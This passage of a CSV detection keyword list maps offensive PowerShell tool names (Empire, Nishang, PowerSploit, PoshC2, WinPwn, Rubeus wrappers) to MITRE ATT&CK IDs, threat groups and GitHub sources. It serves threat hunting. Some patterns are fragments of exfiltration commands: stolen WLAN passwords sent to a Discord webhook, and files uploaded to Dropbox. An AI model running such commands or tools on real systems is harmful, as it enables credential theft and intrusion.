T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Invoke-PsGcat*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Invoke-PsGcatAgent*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Invoke-PSImage*,offensive_tool_keyword,Invoke-PSImage,Encodes a PowerShell script in the pixels of a PNG file and generates a oneliner to executenInvoke-PSImage takes a PowerShell script and encodes the bytes of the script into the pixels of a PNG image. It generates a oneliner for executing either from a file of from the web.,T1027 - T1218 - T1216 - T1059,TA0002 - TA0008 - TA0007,N/A,N/A,Defense Evasion,https://github.com/peewpw/Invoke-PSImage,1,0,N/A,N/A,10,2075,401,2019-09-23T15:17:03Z,2017-12-17T18:41:44Z -*Invoke-PSInject*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-PSInject.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-PSInject.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1085,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-PsUACme*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*Invoke-PsUACme*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Invoke-PsUACme*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Invoke-Pwds.ps1*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,1,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*Invoke-RBDC*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-RBDC-over-DAVRPC*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-RDPwrap.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-ReflectivePEInjection*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,1,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*Invoke-ReflectivePEInjection*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-ReflectivePEInjection.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-ReflectivePEInjection*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1107,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-ReflectivePEInjection*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1083,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-ReflectivePEInjection*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1137,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-ReflectivePEInjection*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Invoke-ReflectivePEInjection*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*Invoke-ReflectivePEInjection.*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*Invoke-ReflectivePEInjection.ps1*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,1,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*Invoke-RefreshToMSGraphToken -domain -ClientId *,offensive_tool_keyword,TokenTactics,Azure JWT Token Manipulation Toolset,T1134.002 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/rvrsh3ll/TokenTactics,1,0,N/A,N/A,5,439,67,2023-09-26T18:45:16Z,2021-07-08T02:28:12Z -*Invoke-Reg1c1de*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-RegistryAlwaysInstallElevatedCheck*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-RegistryAlwaysInstallElevatedCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-RestMethod -ContentType 'Application/Json' -Uri $discord -Method Post -Body ($Body | ConvertTo-Json)*,offensive_tool_keyword,WLAN-Windows-Passwords,Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.,T1056.005 - T1552.001 - T1119 - T1071.001,TA0004 - TA0006 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords,1,0,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile * -Headers *,offensive_tool_keyword,OMG-Credz-Plz,A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.,T1056.002 - T1566.001 - T1567.002,TA0004 - TA0040 - TA0010,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz,1,0,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*Invoke-ReverseSocksProxy*,offensive_tool_keyword,Invoke-SocksProxy,Socks proxy - and reverse socks server using powershell.,T1090 - T1021.001 - T1021.002,TA0002,N/A,N/A,C2,https://github.com/p3nt4/Invoke-SocksProxy,1,1,N/A,10,10,742,176,2021-03-21T21:00:40Z,2017-11-09T06:20:40Z -*invokereverttoself*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor script menu for Powerview/SharpView,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/PowerView3-Aggressor,1,1,N/A,10,10,125,39,2018-07-24T21:52:03Z,2018-07-24T21:16:10Z -*Invoke-RevertToSelf*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor script menu for Powerview/SharpView,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/PowerView3-Aggressor,1,1,N/A,10,10,125,39,2018-07-24T21:52:03Z,2018-07-24T21:16:10Z -*Invoke-RevShellServer.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-Rubeus*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-Rubeus*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-RunAs.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-RunasCs*,offensive_tool_keyword,RunasCs,RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential,T1055 - T1134.001,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/RunasCs,1,1,N/A,N/A,8,722,107,2023-05-20T01:19:52Z,2019-08-08T20:18:18Z -*Invoke-RunasCs*,offensive_tool_keyword,RunasCs,RunasCs - Csharp and open version of windows builtin runas.exe,T1059.003 - T1059.001 - T1035,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/RunasCs/,1,1,N/A,6,8,722,107,2023-05-20T01:19:52Z,2019-08-08T20:18:18Z -*invoke-runaspayload*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Invoke-RunningProcessCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-S3ssionGoph3r*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-S4U-persistence.ps1*,offensive_tool_keyword,viperc2,vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/FunnyWolf/vipermsf,1,1,N/A,N/A,1,78,37,2023-09-28T08:36:47Z,2021-01-20T13:08:24Z -*Invoke-SafetyKatz*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SamBackupFilesCheck*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-SauronEye*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SccmCacheFolderCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-ScheduledTasksCheck*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - 